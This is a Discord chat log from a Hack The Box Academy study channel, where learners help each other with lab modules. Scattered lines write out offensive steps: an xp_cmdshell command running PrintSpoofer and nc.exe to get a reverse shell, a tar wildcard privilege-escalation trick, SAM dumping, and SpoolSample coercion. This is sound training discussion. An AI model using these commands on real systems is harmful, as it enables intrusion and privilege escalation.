#modules

There might be

Maybe url encode as you type and hit enter

That didn't worked.. will check another way

I mean you can manually type it lol

well, i was looking for a shortcut for future use

Looks like there's a tool https://www.whiteoaksecurity.com/blog/burp-suite-macros-reshaper-guide/

Attacking GraphQL will be replacing Session Security, huh..

hmmm.. thank u 🫡

i've experienced this only two times. every other question was fair

it’s not consistently it’s only been a few times

if you are having trouble, you might have to reread the section/module again and perhaps do some additional research to fill in the gaps

Yes, that surprises me too

tbh session security wasn't the best module

I am expecting a big change on CBBH

a lot of new modules

i'm wondering how they're going to teach CSRF now since Session Security was the module that introduced it

CWEE has Advanced XSS & CSRF Exploitation so it has to be taught in some module

maybe they will introduce it on other module

maybe they will add it to xss module

After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.

What is the API key the inlanefreight.htb developers will be changing too?

i need help with these questions from Skills Assessment Information Gathering - Web Edition cbbh

Did you ReconSpider?

it tells me the IPstack api key not found

?

Ah

That's the wrong reconspider my guy

how can i do it ?

There's one provided by the module

There's a command given to download it

git clone https://github.com/thewhiteh4t/FinalRecon.git | this one ? i did download that but having the same issue

That's not the right one

https://academy.hackthebox.com/module/144/section/3079 this is the page that has the link and instructions

ok thanks

How do I make this bigger

Click the fullscreen button in academy

But fr just drag it

It is fullscreen and I tried to drag it all I can

Where the 3 dots are

Drag that up

If that's as big as it gets you need a bigger screen or window

Yup but shi... doesn't get bigger

Then you have a shit resolution

¯_(ツ)_/¯

command+q

That’ll just close it

In the current Broken Authentication assessment, a fuzzed user was found, but the password was not found using the same wordlist (10 million used in the module). It seems that another wordlist may need to be used. Any help, please?

The module shows you techniques on how to create password lists.

Do you mean I have to create a word list or customize it with grep?

https://academy.hackthebox.com/module/110/section/1056

How am I supposed to change the cookie when it's not a part of the request but only response?

I tried manually inserting Set-Cookie in the request, but didn't seem to do it.

If the server responds with a Set-Cookie: name=value, your next request should contain the header Cookie: name=value

i have problem i am scanning using the IP address mentioned in the modules but NMAP tells me the host is not available ??

check ur vpn

ok

i have a stupid question if now the questions is find the flag on the desktop of user SQL01 i am on the skill assessment 2 in AD module
how can i know the ip of SQL01

ipconfig ?

nxc ?

ok lets say i got range 1.1.1.0/24 and i nmap scanned this and found 3 ips which is for who ?

and what if there is like 50 users in the AD

How would be the two related?

Are you assuming that every user has a machine?

i know its stupid question or i am kinda brain fried here

if you are reading AD enumeration and attack and you can't find out this , you may need to take a step back

lol

its literlly learning its called ACADEMY

Well if you have a foothold on one of the windows machines, often you can ping <hostname>

He's meaning you're missing something more fundamental my guy

yeah but there's some pre-requirement to learn thing

Nothing to do with it being academy, but pings hell nmap scans with -sCV may reveal hostnames

I believe the second assessment gives you a parrot foothold that's sitting in the network

@distant island https://academy.hackthebox.com/module/details/143 read this to understand why I told you that

Best to specify; "a firm grasp of the following..."

yeah exactly this part

Otherwise it looks like you're linking him to the module he's doing 😉

Oi no spoilers

Also I'm assuming you added -Pn to the scan

no i didnt

-sn

-sn ?

YES

why ?

to see the open IPs

Well -sn won't run port scans, and you said you found 3 ips, put those in a list

i dont want a port scan i think yall didnt get the question i am asking

Are you sure you're using the right exploit

you can use nxc it's way more better in AD env , and it gives a handy infos

You're not understanding the breadth of what I'm saying

You have ips

You can utilize port scanning to discern which hosts are which

Such as -p 3306

For mssql

Or 1433/1444

Again basic service enumeration can go a long way

yes i got what u r saying but is this the only method cause if i am in a big env with like a huge number of ips it will be super hard

Dude

Don't overthink this

You're literally hindering yourself because you're overthinking

You have a small environment so don't think too hard

What ifs are fine and all; but you're not in the what if

You're in a specific scenario

Hey, so im currently super stuck on the Attacking Authentication Mechanisms module during the SAML Signature Wrapping Attack. Anyone that i can dm for advice on my XML payload, cause for some reason it is not working...

Also the key bit of the "a firm grasp of the following..." is the pivoting module

Hi

is it possible that bloodhound doesnt show all the permissions a user or group has over other users and groups?

Sometimes yeah

And you'll need to run another collection

is that because the user that ran sharphound doesnt have read rights over that user /groups acls?

Bloodhound collect data with the user privlage u have now so if u normal user and collected data will be different from if you are local admin and collect data

And so on

that makes sense

thank you

This is why its also advisable to recollect data if you managed to escalate preivlage or pwned a higher value user in the domain

how to delete zombie files

i tried 3 diff wordlist non of them work, what should i do

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

module:/Footprinting/DNS

Are we not allowed to type the answer on the tasks anymore? Now it’s a “ show answer” sup with that?

anyone done Attacking Authentication Mechanisms - SAML Signature Wrapping Attack here?'

It appears liike the flag for Injection Attacks in the brand new Attacking GraphQL module is not working.

anyone else have this problem?

<@&861185840277487616>

i think this is how that works at least

@steady dock has been typing for ages

It just makes a bunch of ldap queries my guy, very little do with your current user, as long as your user is a domain user

The missing info is just a query that didn't return in time

why wasn't this removed?

Often you may find info sharphound/bloodhound misses and vice versa

Because the user didn't delete their message

I though the mods removed them

whatever though

Hi everyone,

I'm working on the Injection Attacks Skills Assessment. I managed to find ||xpath injection|| on the internal app. However, when I dump the data, I'm unable to fully display the output. When I try to get each element at a time, I'm not succeeding. If anyone could provide a small nudge, I would appreciate it.

Don't forget to url encode every character of the payload

DM me

hi I am literally following along with the section that seems to want me to follow along. the section is Attacking SAM section of Password Attacks module. I am doing the exact command it says to do and it won't let me do the command on Windows and it can't find the share even when I specify a share network I just created on Linux.

I don't want to share actual content publicly because I know that's not allowed in Tier 1.

anyways, can someone help me out here?

Did you run your cmd as administrator

yes

cmd is run as admin. I can close and open it again but I'm 100% sure it is being run as admin

in fact it even says "Administrator" at the top of the cmd prompt

brb

You try to run reg.exe rigth ?

Do you find yourself in the System32 directory? For dump the file into Of their respective repertoires

I'm in C:\

and on linux I have the Python script running

On C:\Windows\System32\

Execute the command

Hello all.
I’m just starting out on HTB academy, Linux essentials and I’m trying to figure out the questions at the bottom but some of them I feel so lost like I’m missing a piece of the training I should of read or should know already but I was recommended this by HTB as the one to start off with. I’m unsure if this is the right place to say this or even if I’m wrong. It feels like I’m tier -1 and I’m so lost. If anyone could dm me give me tips on what modules I should do first?

hi I think I may have solved the problem

And mv the result on C:\ or I imagine there is your sharing

c:\>move sam.save \\10.10.14.143\CompData                                                                               Access is denied.                                                                                                               0 file(s) moved.```

I had to change the IP address

but it still denies access to move it to Linux

Move Sam.save \ip\compData work for me did you run smbserver with sudo ?

the problem is the folder didn't exist that I was looking to transfer to

I did run it with server but had to modify which Linux user I was transferring it to

now its fixed

Okok yes I forgot to ask if the directory existed

what folder in Linux do I look for to list the files?

wait found it

i'm stuck on modules 18 section 78, im trying to find the name of the last modified file in /var/backups but I can't figure it out.

i've tried ls -it and looking through the directories file but I still can't find it

can someone give me a hint?

Are you ssh to the target?

@fathom pendant do you know if I rdp from the bob's windows machine or do I do it from my machine to trigger event 4771?

From bob

As the DC is an internal machine

Okay I tried this I will reset the target Ip and try again

how can i get email address from IMAP/POP3 ?

You ask it nicely

But imap and pop3 have different syntaxes

<literally anything> command <args> is the basic imap structure

#modules message

can i use printspoofer or rouge potatos without metasploit

Yes

They exist as standalone portable executables you can download

At least prinspoofer does

i tried it with nc.exe but it give me a normal user not ntauthorty

Running a command using printspoofer?

NC isn't a privesc tool. It'll execute under the user context of whomever launched it

||xp_cmdshell c:\users\Public\PrintSpoofer.exe -c "c:\users\Public\nc.exe <ip> <port>"||

this return as a normal user but it help with escaping the sql

how can i excute the printspoofe the right way

for priv esclation

why not just run it again from the reverse shell

^

Working through wonky pseudo shells isn't fun

should i try normal shell from revshell.com cause i dont want to use msfvenom ones or metasploit

Also I think sql doesn't like \ paths

Could be wrong though

@fathom pendant am I doing something wrong? sorry the chat is overloading on you but I tried again and 4771 doesn't appear anywhere

Thank you so mush

i didnt know about the print spoofer exploit then, so i just ran a base64 powershell reverse shell

No idea dude and I'm not loading up the module to sanity check

i will double check again

Oh with nc for windows don't forget to do -e powershell

Or -e cmd

So it can actually execute stuff somewhat properly

🫡

it worked without metasplit after excuting the normal nc.exe shell then exuteing printspoofer with a rev shell

¯_(ツ)_/¯

( -_•)▄︻テحكـ━一❤️

hi

Is there a path in Tryhack me for web penetration testing?

Htb cbbh is great

or web

What is cbbj

Check in htb academy bug bounty path

Under job role path

i’ll have a look

i have my ceh exam tomorrow

It will be okay u can do it

Good luck

thanks my men

SOEMON

<@&861185840277487616>

Tht not rule break tht a defendd bro

Also ur kinda right bc

Hello,
I'm doing the FootPrinting Skill Assesment "Easy" but I'm currently stuck
So I started by performing an nmap and found 4 interesting ports.
For both FTP ports I can login using the credentials provided but I can't do any enumeration. Each time I use ls or any other command I have the following message (see screenshot).

For the DNS enumeration I found several subdomains & IPs but nothing helping me to retrieve the flag.txt.

PS : I managed to retrieve the files using wget but I still don't understand why using ftp command I couldn't retrieve anything.

anyone got a way for fixing this problem whenever i boot my kali linux up?

using a VM for it

use a better hypervisor like vmware workstation pro (its free now) or change your graphics controller to vboxsvga in settings

vmware better than virtualbox?

i've been using a virtualbox my whole life

ok then change the graphics controller

for me and alot yes

will switch over tomorrow morning

it says right there what your error is

done but it claims an error

'vmwgfx seems to be running on an unsupported hypervisor'

ah

yes

so i am on the last part in the skill assessment 2 in htb i finished all but i am only stuck here cannt login to user

AD moule in CPTS

what's the actual thing you're stuck on unless you literally mean you can't log in.. in which case what's the error

i literlly got everything and i know how to control the domain after becoming this user and i have the user password

but cannt login to him

that's a lot of words with no real substance as to your actual issue

if you have domain admin, you can do whatever you want, including log in

i have this user credintials i should now login to DC01 but i cannt

is your keyboard plugged in?

Is the user actually domain admin tho?

"i can't log in" isn't describing the problem in any way that anyone can help you

you can't log in.. to what? with what app? what syntax? etc

you're saying absolutely nothing about your actual problem

iirc having rights over something does necessarily mean ur in a group

bruh you are giving away way too much of the module

its already in the question shown i didnt spoil anything

😭

it is, you spoiled the username

i know

and how to abuse it etc

Have u thought about adding ur self first?

i marked it as a spoiler

sorry i am kinda brain fried ngl

yes this is exactly what i want

but dont know how

Powershell?

he said his problem was that he couldn't log in

yes i literlly couldnt name the problem i think my brain is kinda lagging from 10 hour solving labs

if u dont mind can u explain this part

Login which way?

If u have domain admins why not dump creds

can i dm u cause i dont want to spoil things

Ye

Module: Linux Privilege Escalation
Section: PATH Abuse
Link to section: https://academy.hackthebox.com/module/51/section/472

Just finished this section. What I don't get is why is it necessary to go through all this trouble of adding it to the PATH if we could just run a script directly?

Learning things manually will help cause in real world av and edr is pain and sometimes u cannt run scripts

Can't run scripts? So you're saying there'll be instances where I can create a script, give it executable permissions, but can't run it directly cuz of av and edr. So, calling the script via the PATH somehow helps with bypassing av/edr?

In some instances u will not be able to run scripts at all or even create and save ones

no, this is privesc, not evasion

Module: Linux Privilege Escalation
Section: Wildcard Abuse
Link to section: https://academy.hackthebox.com/module/51/section/473

In order for this to work, the cron job should be running with root privileges, right?

Also, I'm assuming that the wildcard character * goes alphabetically? Since it'll take the checkpoint arguments first?

So... what how does PATH abuse help then?

there might be something that runs as root and executes a certain binary

if u edit the path it will run urs first

hello everyone I'm new to htb, how does the module works in htb academy? I would like to do the cpts module path, does it has a limited time for access ? sorry for repeating this question as I'm not sure where to ask

Like a cron job?

any binary like TLattice said

yeah like "ls" shown in the module

it will go to your directory first then check /bin

In the Windows Evasion Techniques module, is there a supposed to be an IDE installed to compile programs?

Or do I need to compile everything on my machine and then move it over?

Got it, but it'll most likely be from a cron job, yeah? I'm asking cuz you need to figure out which binary to choose when doing the PATH abuse.

No. This has nothing to do with cron jobs. a cron job is a scheduled task, that's it. a cron job itself isn't a binary.

you could use it to run whatever command you want

Yeah, I understand it has nothing to do with cron jobs, but it's not like anyone can execute a script that runs as root, right?

Nvm, I just realized as long as permissions are there, it can be done, my bad.

i think cronjobs have the path as the user running it

so yeah, it wont run through ur path

Ouhhh, wait, then won't that be the case for any script that uses a binary as well?

No because you might have permissions to execute a file. But within that file it executes commands with root privileges or you might have the power to run the binary with sudo

yeah, u need to be able to execute it

They give you a VM in one of the first sections that has development tools.

If you don't want to install tools locally, you'll have to bounce between firing up the VMs in each section, and the original development VM.

honestly i used my own comp because it was slow a f

Ahh okay, no I'll just set it up locally and map the drive

Yeah makes sense

Ahh, I see.

If you get stuck in the module, you can DM me. It has some rather confusing layout.

Okay thankyou, you'll probably find I will

Can someone explain to me how the * wildcard in the example in the section takes file names as command arguments but not as literal file names? Won't it throw an error when it tries to process tar -zcf /home/htb-student/backup.tar.gz --checkpoint=1 since there's not file specified?

what?

I'm trying to understand how the * works here.

Does it list every single file name in that one command?

* is a wildcard for any character and any number of characters

So if I have a directory with the following files:

--checkpoint=1
--checkpoint-action=exec=sh root.sh
somerandomfile.txt
root.sh

When it processes the *, it'll basically run:

tar -zcf /home/htb-student/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh root.sh somerandomfile.txt root.sh

no

it'll run them separately

it doesn't just run anything in the folder

Separately? So like this?

tar -zcf /home/htb-student/backup.tar.gz --checkpoint=1 

tar -zcf /home/htb-student/backup.tar.gz --checkpoint-action=exec=sh root.sh

tar -zcf /home/htb-student/backup.tar.gz somerandomfile.txt

tar -zcf /home/htb-student/backup.tar.gz root.sh

the file names are arguments for the tar command. it only executes the thing you have after exec=

yeah like that

Won't some of those individual commands throw errors though?

Like I'd expect the first command to throw an error and maybe even the second.

no 1 and 2 are the same command

they're just arguments into the tar command

I'm confused as to how that works, still don't understand how it processes the * wildcard.

i was wondering that is there any nse script which will tell the contents of robots.txt file i have seen many time that it displayes the content of that file . i used -sC default script option

* is just a wildcard in linux itself. if you have file1.txt file2.txt file313137.txt, you can type "rm file*.txt" and it will delete all three files. if you typed "rm file?.txt" it would only delete file1.txt and file2.txt, because the ? is a wildcard for only one character while the * is a wildcard for any character and any number of characters.

that's all it is, is a wildcard that can replace characters

Yeah, I understand how that works, I just am trying to understand how the final command when it's processing looks.

Because the command being repeated like this doesn't sound right.

https://medium.com/@polygonben/linux-privilege-escalation-wildcards-with-tar-f79ab9e407fa

essentially you're telling tar to backup all the files, but you hijack the command with filenames that act as arguments to the tar command

tar -zcf /home/htb-student/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh root.sh somerandomfile.txt root.sh this is correct

you're telling tar to backup all the files in that directory, but because the filenames are also tar arguments it triggers that action from tar, in this case an action is executing your script

Chatgpt can also explain some topics in your preference too @normal sand

Ahh, thanks, that's what I wanted to know. Just saw it in the article you sent as well.

Thanks for the tip. I tend to forget sometimes 😅

Btw follow up question, I already tried asking GPT, but it didn't really provide an explanation. In the man page for tar, it states the following:

--checkpoint-action=ACTION
              Run ACTION on each checkpoint.

In our command, we use the exec action but I didn't find this to be specified anywhere in the man page. And when I asked GPT, it just said that it's not mentioned in the man page but it's well-known.

So, if I wanted to perform wildcard abuse like this but on another binary, I'll just have to Google and see if the other binary has got some sort of execution parameter since it may not be specified in the man page?

https://gtfobins.github.io/#

can someone help me I'm tring to solve the question Within the "webfuzzing_hidden_path" path on the target system (ie http://IP:PORT/webfuzzing_hidden_path/), fuzz for folders and then files to find the flag. in the Directory and File Fuzzing module and whatever I do I can't find the hidden path?

I tried finding hidden 301 pages the only one that comes up are w2ksvrus and any HTML page I open up says this is a example page

for pivoting skill assessment, am i supposed to be able to rdp to the last dc? thinking that rdp is fried rn

if someone configured a firewall to resoponde with rst flag nmap will consider it closed and if the port is actually open so how can we determine the state here

netexec indicated user Johanna cannot rdp
but i am able to rdp using xfreerdp

can anyone clear my confusion here.

i wasnt able to rdp anywhere but still completed it

@normal sand I am also doing CPTS path and I had noticed that we were both doing "Password Attacks" module at some point in time. Now, you are way ahead of me. I just wanted to know your timeline. If you don't mind, can I dm you?

I solved the last flag. But I couldn't RDP. The other machines were ok.

if you try local-auth does it work?

doesn't look like it's domain joined

got it, now working as expected

im here to rant. why are remote rdp machines so slow? registering a click takes 10 seconds.

Hey how do i install httpx on windows

pip install httpx
https://www.python-httpx.org/

Kk thanks

If it helps, I get better responses when using pwnbox than connecting from the vpn

anyone finsh footprinting module
i need hint

for the Skills Assessment?

no, DNS

need more details

for what question

• 1 What is the FQDN of the host where the last octet ends with "x.x.x.203"?

i tried all subdomain@

how can i use dnsenum for sub subdomain

do we get access to tier 2 maacine in 38$gold sub?

or only cubes

monthly subscriptions, except the student subscription, only give cubes

i was using the student sub before which give access till tier 2 i though gold one will give same exp but with 500 cube but it seem it only give cubes

Only the annual subscription gives access to the modules.

The monthly subscriptions give you cubes so that you can unlock modules

ok

did you use dig axfr already?

that should initially have given you a subdomain

Hey, sure. You can DM me but idk when you saw me doing the Password Attacks module. It's been a long time since I completed that.

what am i wrong doing here?

Allso write the section and module name...

https://academy.hackthebox.com/module/116/section/1466

Hey I have a question about the SQL module. Can someone explain why one is wrong and the other is right. I find it very contradicting

notAdmin doesnot exist so it fails the login attempt

what about the OR part, does it not consider it

it returns a true

python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py <USERNAME>@<TARGET IP> -windows-auth try this might work

guys , i have 1000 coins and wanted to open the modules based on web security , i have ssecure js 101 in mind or advanced xss/csrf,Modern Web Exploitation Techniques which one should i try first

JS cost 1000 and other two combined cost 1000

not working

Dm

done

1- What is the API key the inlanefreight.htb developers will be changing too?
[ creepy crawling ]

2- After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com
[skills Assessment]

what is the answer for these questions from ( information gethering web edition )

please can someone help with attacking session cookies

I think you're right, this looks like a typo.

you can fire up sqlite and play around with it, that helps me at least

I'm trying to find that section to take a look. The only question I might have is the stacked username = '...' or '1'='1' and password='something'... it can depend on how those and/or statements are evaluated. I didn't add password in my example above.

What have you tried? What exactly is not working?

Anyone can help me with smb-os-discovery nmap script I'm trying to usd it but it shows me just port not script output

try to run it with -sC

or with verbosity

Same output

Sudo nmap --script smb-os-discovery.nse -p445 IP -sC -Pn -v

what module / section is this from

https://academy.hackthebox.com/module/77/section/726

can you list the shares with smbclient?

Yes I can

I tried to use other nmap scripts such as enum user and those too doesn't working out for me but in msfconsole auxiliary are working fine for me

not sure then, i dont have notes on the module so cant verify what i did

your command looks correct tho

if the script files are propely installed and placed where they're supposed to be it should work

They are at /usr/share/nmap/scripts/

don't specify the port and try again

also probably run it as root

Anyone who managed to pass the check on the last question of Active directory bloodhound skill assestment?
Seems like no number works :/

that quesiton is kinda cooked

Did everything still no lead

it's 4/13

Check https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
Then you just have to convert the query to Azure

iirc the answer is just wrong

some users didn't get counted

I know there are 13 users in total and yeah 4 should be the users that have a path to global admins which should give 30.77 but it is still not working

don't round up

no clue, for smb there are other better tools anyways

OMG! That was the issue, LOL. Lost whole morning when I had the answer in my hands

No, the answer is correct. But you are not allowed to round

Hello

Is there a phishing module?

https://academy.hackthebox.com/module/details/103

No like email phishing with gophish and stuff

Please name them if you can

I am tasked to figure out why our phishing campaign is going to spam folder and to propose solutions

Sounds like a work thing not an academy thing

Because your company has done its homework and implemented appropriate measures to classify emails.

^

Well I don't know much about it I just need somewhere to get started I figured if there were a module for it it'll be a decent starting point

No, there is no module about it.
But as I said, your company has done its homework and configured the mail server correctly.

Not sure what you mean?

Hello guys! Anyone know a good resources for SELinux, AppArmor and TCP Wrappers?? I’m on “Linux Fundamentals”
Thanks

Oh gosh I went down this rabbit hole, let me check if i saved any of the links

https://www.cloudflare.com/learning/email-security/dmarc-dkim-spf/

Thanks 🙏

For SEL These were the two best resources I found. One of course is the fedora stuff... the other is a walkthru. Im sure theres others but this got me familiarized pretty good.

https://www.computernetworkingnotes.com/linux-tutorials/selinux-explained-with-examples-in-easy-language.html

https://docs.fedoraproject.org/en-US/quick-docs/selinux-changing-states-and-modes/

Uh no like I mean we do phishing campaigns to other companies as part of the specifications of certain audits, this could still help though as we might start asking clients to whitelist us or something, or to configure things in a certain way, thank you.

Btw you don't need to do this

Hello,
I'm currently doing the FootPrinting Skill Assessment - Hard.

So I started by an nmap with -sC -sV and on all ports and found ports linked to Imap/POP3 and the ssh port are open.

I tried to apply what I learned in the module but without any creds I couldn't get any useful information. I also tried to do some brute force without any success.

Those are 100% optional

@rustic sage I recall app armor being significantly easier to config not that either of them were hard, just tedious, and i did it while house sitting for a friend so i donth ave links in my notes or browser history but heres one i did browse beforehand.

https://computingforgeeks.com/apparmor-cheat-sheet-for-linux-system-administrators/

Did you scan udp?

No I didn't ! I will do it right now

Thank you so much 🙏🙏🙏

ah, i had my notes partitioned here, this is the exact apparmor primer i followed. https://www.howtogeek.com/118222/htg-explains-what-apparmor-is-and-how-it-secures-your-ubuntu-system/

Really? Is not important?

Its not essential to the module, but its no less important

Thank you 🙏

¯_(ツ)_/¯

it seems i skipped tcp wrappers, if you find a primer that you find enjoyable and wouldnt mind sharing i'd be appreciative. i think i have just the tcp wrapper notes from the module, havent "done" it though.

👍

Have fun

Thanks 😊

It was sarcasm lol

Setting up any stuff like that is not fun

Good afternoon

I have gone into /etc/hosts.

10.129.201.90 gitlab.inlanefreight.local
10.129.201.90 inlanefreight.local

The thing is, I have to find more subdomains. I make a ffuff

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://FUZZ.inlanefreight.local

And it does NOT find subdomains.

If I incorporate the subdomain in /etc/hosts.

10.129.201.90 gitlab.inlanefreight.local
10.129.201.90 inlanefreight.local
10.129.201.90 blog.inlanefreight.local

It does find it, launching exactly the same command with the same dictionary

blog [Status: 200, Size: 50120, Words: 16140, Lines: 1015, Duration: 892ms]
gitlab [Status: 301, Size: 339, Words: 20, Lines: 10, Duration: 7ms]

Does anyone know what's going on here? Shouldn't it find it even if it doesn't have an entry in hosts?

You need to fuzz the host header

What you're looking for is probably a vhost, not a subdomain. So add the host header like Marcie suggested.

While normally used interchangeably, when fuzzing it does matter

What your current fuzz command is doing is trying to fuzz using public dns

Anyone can help me some smb tools for my query?

And asking public dns "hey do you know where x.inlanefreight.local is"

@rustic sage this was my experience, i hope yours is less frustrating. spin up a vm that has SEL installed out of box, and ubuntu for apparmor, should take a very small amount of hassle out it

All the tools you need are in the reading

@fathom pendant and @normal sand BINGO! thx a lot!

My query is this @fathom pendant

Ok?

There's also multiple ports tied to smb btw, not just the one

I believe the reading goes over this

And it goes beyond scanning

I tried every smb port listed on the nmap full port scan yet no lead

what are you trying to find?

The OS

Os version

Script isn't giving any outputs

Then it doesn't have to be done via that script, right? How about running an aggressive scan or OS fingerprinting?

Everything you need is provided by the section. Beyond just scanning

I tries -0 as well as -A but no lead

Man I can't see what you're seeing

This is the footprinting module yeah?

Idk which module you're at but you could try running all the smb scripts with something like --script smb* I think?

I didn't see where you clarified the module you're working on

I used every nmap script mate even enumuser too but it doesn't post any script output

https://academy.hackthebox.com/module/77/section/726

@green musk do you need the exact OS or just a is this windows/linux? you can check the TTLs 64 = linux 128 = windows. this can give a rough estimate.

This section doesn't ask about OS

huh where in the section did they ask you to find the os version

Service scanning namp script

The examples won't always match what you get

But none of the questions ask about OS version

-A does return the os version

just ran it

Then how could I try to find the os running as without the script too I can't get any output my command is
Sudo nmap -sC -sV -p- IP -O -A

You're heavily overthinking it

Also your image was removed bc it didn't embed

Yep the scan discovered the os btw

Whatever file format its being saved as isn't supported by discord embed btw

It's okay for the Pic right now but I don't know why my nmap scripts doesn't show me any outputs

Dude

Fuckin

Look at

The output

Of the image you took

Os: ..

Yes I can see that but when I'm trying to input that same command to my kali instance it doesn't show me host script results::

Ah

Well

it's not important

It's not integral to answering the questions

I answered all the questions man but I want to understand my I'm facing this issue

Just ignore it and move on

The only thing I could maybe say is reinstall nmap or make sure it's updated

I thought here someone could explain me why I'm not getting the output I'm desired too

¯_(ツ)_/¯

Lemme do that

sudo nmap ?

theres instances where you need to run it as sudo, cant remember the specific scneario(s) at the moment, worth a shot

chatgpt suggests OS Detection might be one scenario, though they suggest a diff cmd for this, Example Command: sudo nmap -O -sV <target>

take that with a grain of salt.

That's shown btw in the module

right on

At least I think

At least -A is

Which does a whole lot of nmap commands wrapped into it

Does everyone have a connection to their machines?

English #rules

English please

Marcie is too fast

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

https://tenor.com/view/im-everywhere-baby-benedict-townsend-youtuber-news-im-all-over-the-place-im-in-lots-of-places-gif-17859881

I am happy you are

Hello, I'm new here. I have just completed my degree in computer systems security. I was very keen to develop my skills in this area and I am open to your suggestions on how to become an ethical hacker.

#modules message

@fathom pendant I want a plan to be competent in IT security

Get it from the link above, and follow academy modules

choose a path

@storm elk All right dear thank

@storm elk send the link please I don't see it

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

This is my second message here since 2022

Op

Been here for 2 years, still haven't linked to access #general

Hi. Im trying to open the vpn of the academy in the linux terminal with "sudo openvpn academy-regular.ovpn" but there is an error "Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn". What is happening?

It means the file isn't in your current directory

If it's in your Downloads folder you'll have to cd Downloads

Then run

its in desktop

Then you'll need to cd ~/Desktop

ok ty

i will try

When you open a terminal it Defaults to home

/home/<your username>

Which is what ~ is usually aliased as

Ty man now it works.

I have to do this everytime i want to connect to a htb vm?

Only once per session, not every single time

You can do as many modules as you want with that one connection

"TRX leaves his mark", Can anyone give me a clue? FullHouse Machine

#1263635449335910531

on my private please

i not have access

Get verified.

Please read #welcome and #rules 🙂 it will explain how to get verified

what i have to do to connect to a htb vm? the command says error conneting to that ip

The authenticity of host '10.129.105.95 (10.129.105.95)' can't be established.
ED25519 key fingerprint is SHA256:PHsjpBEAl6hSCzjVohppUybupbLXdBZy8FqtwlMpmjU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])?

yes

just type yes

give a error

ok

Hey im doing the attacking thick client applications section i try to change permisions of temp folder but i cant understand how to do it by reading whats written in this module could anyone help me out

It's a windows basics thing

Disable inheritance--> remove your user from having delete access

What is the path to the htb-student's mail?
Which shell is specified for the htb-student user?
I dont know how to resolve that 2 questions with the info in the linux fundamentals module.
Maybe is bc i dont understanding the question english is not native language

env command

A lot of the required tools are given

Ok i will search info about that command

Literally just run it

ye i see but idk why is show that info haha

env lists environment variable details

man env

ok

hey i was solving firewall evasion lab and when refreshing the status page of alerts of the target it is automatically increasing and i dont even started scanning . is it bcz different user are on the same subnet and scanning the same target

No

Labs are independent

It's just like that

I wouldn't worry too much about the status thing

well obviously its going to increase every time you refresh the page you are basically sending a request to the webserver which is being logged

in that particular section there was a graphic which explicitly mentioned contains user mail

if i refersh the page it should increase by one but it is increasing like 80 to 85

dw about it too much, perhaps there are more calls being made check the networking console

just carry on with your lab

I ignored the status page entirely

Only if the box stops responding you should check

Hello guys, when accessing the labs in the module "API Attacks" the target fails to come up and the status continously reads "Target is spawning". Can anybody assist me.

Change vpn regions

Hard refresh page

https://academy.hackthebox.com/module/51/section/1640 Python Library Hijacking
What am I doing wrong?

You can't modify the path, so just move on

file psutil.py need create in tmp or /usr/lib/python3.8

No it doesnt

You can edit the library it's calling directly

is it the terminal where i start the vpn all the time "typing"?

It doesn't work or I don't understand something

You don't run it with sudo

Or at least not that I remember

Linux privesc module yeah?

yep

Oh

It's because you're doing ./

Do the full filepath

The way to interpet the sudo command is that it's explicitly stating a path

You might get away with dropping the ./

Yes because you can't edit the path

Try the other things

#modules I'm stuck in kerberos attacks unconstrained delegation - computers part .

C:\Tools>.\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
TargetServer: \\dc01.inlanefreight.local, CaptureServer: \\sql01.inlanefreight.local

I ran multiple times but not able to capture the dc01 hash on rubeus. what is going wrong.

im trying to connect with ssh to the hb vm. When i connect it says Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings.
Before i could connect, idk what happens now

whats your terminal cmd for ssh'ing minus the password of course

Okay, I don't know why there are hints in the module. If i still had to decide on my own.

The part with setting the env shows explicitly what needs to be there

SETENV <

i dont understand you

now i think im in but its too slow i cant type

ssh: connect to host 10.129.245.60 port 22: No route to host

I have that problem

check your vpn connection

they are all medium load. Maybe is that the problem?

try to ping 10.129.245.60

its what im pinging

no one can help you without knowing what is exactly the problem , if you can ping the IP , then check if there's an ssh open

I dont know man im new. I just try to connect to a htb vm using ssh htb-student@[ServerIP] and that error appears

I tried with diferent IP refreshing them

What error appears?

ssh: connect to host 10.129.245.60 port 22: No route to host

Nvm I scrolled up

Connect to vpn

If you changed vpn regions you need a new download

im already connected

i will try to download a new file but...

But?

If you change vpn region you need to use a new file

Otherwise you're not gonna connect

can you run ifconfig

and send us the output

it's hard to help without knowing what's the problem

it worked now. I just regenerate everything after deleting "sudo killall openvpn"

so something was wrong with VPN

Do i need to know everything that's taught in linux fundamentals for example in back up and restore i didn't quite understand the encryption that well so like just basic understanding is good or do i need to be understand everything fully ?

forwhat?

no

I'm pretty sure asking for answers is against the rules

its ok im done with it ^^

Just a basic understanding of tools is enough

How many possible values are there for a 6-digit OTP ? i am putting 10,000 as the answer as that is all i can see please can someone point me in the right direction

thats 5 digits

Also 100000 wouldn't be right

1000000 would be correct

Consider all digits are 9s

On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?

please can you help me with this question too ?

and thankyou for your help with the previous question

I thought it was a one time reset token

Check the reading

I suggest fully reading the material before just seeking answers

Ok cool ill give it another read

the password attack module is very heavy specially the active directory section i spent 4 days and didn't finish it yet 💀

bump

the exact next message sent in this channel tells you the answer

Hi

New here

Thanks!

Sorry my bad I didn't see it!

Hello, I want to ask some tip on Directory Listing on Hacking WordPress. When I do it I navigate through all the file and folder manually. So I want to know if there a way to automate the process

you can use wpscan

I try it but dont know which switch

I don't think you need a special switch

if i wanted to use the pwnbox, is there an easy way to download files related to the module?

right-click > copy link > wget <paste>

